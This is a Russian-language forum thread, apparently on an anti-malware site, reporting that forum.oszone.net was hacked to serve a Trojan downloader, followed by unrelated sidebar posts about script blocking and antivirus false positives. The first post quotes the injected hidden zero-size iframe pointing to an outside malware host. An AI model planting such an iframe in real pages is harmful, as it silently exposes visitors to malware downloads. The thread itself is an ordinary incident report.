Перейти к содержанию
vaber

Вредносный скрипт на forum.oszone.net

Recommended Posts

vaber

На этом форуме http://forum.oszone.net/ встроен вредоносный скрипт

<iframe src="http://nerik.info/Alex/index.php" width="0" height="0" style="display:none"></iframe>

Веб-антивирус Касперского детектирует наличие скрипта при посещении данного сайта и позволяет его блокировать (обнаружено: троянская программа Trojan-Downloader.VBS.Psyme.fc URL: hxxp://nerik.info/Alex/index.php//Crypt.DCScript).

Вероятно сайт был взломан и злоумышленник разместил свой скрипт.

На данный момент скрипт удален.

Но как минимум сутки он пробыл, а вероятно и больше.

http://forum.kaspersky.com/index.php?showt...mp;#entry314232

Причем постоянно на озоновском форуме находиться более полутысячи человек.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Ego1st

Эээ нет он меньше суток был, его пофиксили, потом опять кто-то залил..

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
vaber
Эээ нет он меньше суток был, его пофиксили, потом опять кто-то залил..

Меньше суток с того момента, когда на http://forum.kaspersky.com разместили данную информацию. Сколько он до этого там находился - неизвестно.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Ego1st

на газоне думаю это быстро обнаружилось..

хотя небуду спорить малоли чего и где было..

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин

Форум у них на движке vBulletin.

Досточно было получить учетные данные админа, чтобы внести изменения в html-шаблоны форума/

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • кустомер
      Всем здравствуйте. СРАЗУ оговорка:
      Кнопка "Создать новую тему" только на главной странице форума.
      В выпадающем её меню НЕактивны абсолютно все разделы кроме этого.
      Тему разместить хотелось-бы в другом разделе.
      Ответ на тот вопрос ― наверное поэтому.
      Собственно по делу -
      У кого из считающих себя "мастером_своего_дела" могло-бы появиться желание
      подумать и высказать своё предположение метода проникновения файла сценария
      с печеньями (cookies) после того, как весь IP-диапазон адреса хранения файла
      был заблокирован в настройках Outpost, отлично справляющегося по сей день
      с блокировкой ЛЮБЫХ других (кроме этого) IP-диапазонов? Адрес(имя) файла:
      https://mc.yandex.ru/metrika/watch.js Outpost навскидку можно сравнить с другими продуктами защиты - там.

      Вопросы типа "а-зачем-вам-это-надо" будут
      расценены как флуд, отвлекающий от темы. (уважаэмым модераторам)
      Тема относится к способу проникновения этой заразы, а не к конкретному продукту защиты.
    • demkd
      на него уже давно не реагируют они сейчас самый опасный report_crash что дампы отправляет  
    • akoK
    • santy
      из архива uVS на зеркале уберите файл _autorun.zip (если он есть там), антивирусники как правило по этому файлу начинают "сходить с ума". для создания образа автозапуска юзерам он не нужен.
    • demkd
      Там 5 недоантивирусов, я на такое внимание не обращаю, тем более что случается уже не в первый раз.
      И какое зеркало?
×